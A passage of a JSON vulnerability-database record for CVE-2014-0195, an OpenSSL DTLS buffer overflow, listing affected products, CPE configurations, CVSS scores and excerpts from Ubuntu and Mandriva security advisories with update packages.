"trust": 0.3, "vendor": "f secure", "version": "9.20" }, { "model": "isoc v200r001c02spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "ons series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154000" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nip2000\u00265000 v100r002c10spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hyperdp v200r001c09spc501", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "icewall sso dfw r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.166" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "eupp v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "dsr-500 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.3" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.2" }, { "model": "policy center v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.4" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9900" }, { "model": "updatexpress system packs installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "oceanstor s5800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "usg2000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.4.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.92743" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69000" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "oceanstor s5600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.7" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "jabber video for ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.59" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex connect client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "elog v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security module for cisco network registar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "cognos planning fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "project openssl 0.9.8za", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.2.0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "10.00" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "softco v200r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "9.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "big-ip gtm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "s6900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "svn5500 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "agent desktop for cisco unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "agile controller v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "nip2000\u00265000 v100r002c10hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "oceanstor s5800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "css series content services switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "115000" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smc2.0 v100r002c01b017sp16", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "espace iad v300r001c07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "security network intrusion prevention system gx7412-05", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "dynamic system analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "s7700\u0026s9700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.6" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "freedome for android", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "0" }, { "model": "fortios b0630", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "physical access gateways", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "dsr-1000 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "s7700\u0026s9700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "dsr-1000n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89410" }, { "model": "9.3-beta1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "isoc v200r001c01spc101", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "documentum content server sp2 p16", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "oceanstor s2200t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace usm v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "icewall sso dfw r1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-173" }, { "db": "BID", "id": "67900" }, { "db": "JVNDB", "id": "JVNDB-2014-002765" }, { "db": "NVD", "id": "CVE-2014-0195" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.0m", "versionStartIncluding": "1.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.1h", "versionStartIncluding": "1.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.9.8za", "versionStartIncluding": "0.9.8", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mariadb:mariadb:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.0.13", "versionStartIncluding": "10.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0195" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "J\u00fcri Aedla", "sources": [ { "db": "ZDI", "id": "ZDI-14-173" } ], "trust": 0.7 }, "cve": "CVE-2014-0195", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.8, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2014-0195", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0195", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-0195", "trust": 1.8, "value": "MEDIUM" }, { "author": "ZDI", "id": "CVE-2014-0195", "trust": 0.7, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-0195", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-173" }, { "db": "VULMON", "id": "CVE-2014-0195" }, { "db": "JVNDB", "id": "JVNDB-2014-002765" }, { "db": "NVD", "id": "CVE-2014-0195" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of DTLS packets. The issue lies in the assumption that all fragments specify the same message size. An attacker could leverage this vulnerability to execute code in the context of the process using OpenSSL. \nThe following are vulnerable:\nOpenSSL 0.9.8 prior to 0.9.8za\nOpenSSL 1.0.0 prior to 1.0.0m\nOpenSSL 1.0.1 prior to 1.0.1h. One of the patch backports for\nUbuntu 10.04 LTS caused a regression for certain applications. \n\nWe apologize for the inconvenience. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and\n Ubuntu 14.04 LTS. (CVE-2014-0195)\n Imre Rad discovered that OpenSSL incorrectly handled DTLS recursions. \n (CVE-2014-0224)\n Felix Gr=C3=B6bert and Ivan Fratri=C4=87 discovered that OpenSSL incorrectly handled\n anonymous ECDH ciphersuites. This issue only\n affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. \n (CVE-2014-3470)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.21\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes. \n \n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before\n 1.0.1h does not properly restrict processing of ChangeCipherSpec\n messages, which allows man-in-the-middle attackers to trigger use of a\n zero-length master key in certain OpenSSL-to-OpenSSL communications,\n and consequently hijack sessions or obtain sensitive information,\n via a crafted TLS handshake, aka the CCS Injection vulnerability\n (CVE-2014-0224). \n \n The updated packages have been upgraded to the 1.0.0m version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n http://www.openssl.org/news/secadv_20140605.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 857d06ddc6423ad124b23eb760459033 mbs1/x86_64/lib64openssl1.0.0-1.0.0m-1.mbs1.x86_64.rpm\n d7436f2f95df5c1d64d44a745f125bd8 mbs1/x86_64/lib64openssl-devel-1.0.0m-1.mbs1.x86_64.rpm\n 67f6cd6da42f01fb2f6054a2f96872af mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0m-1.mbs1.x86_64.rpm\n 5d7c5712c1ce70a2dd2596e803bc7004 mbs1/x86_64/lib64openssl-static-devel-1.0.0m-1.mbs1.x86_64.rpm\n 9866e03e1c112b0c4cb5587b142cfa63 mbs1/x86_64/openssl-1.0.0m-1.mbs1.x86_64.rpm \n 9ac714afa9a9b30419f2f1f5c9ec4e48 mbs1/SRPMS/openssl-1.0.0m-1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTlcuxmqjQ0CJFipgRAtEQAJsEeYwuETVPTeadp+pdK9wJfQqgOgCfXDif\n30xyBHFmHJa6MS/00iqN2aY=\n=9sdw\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available 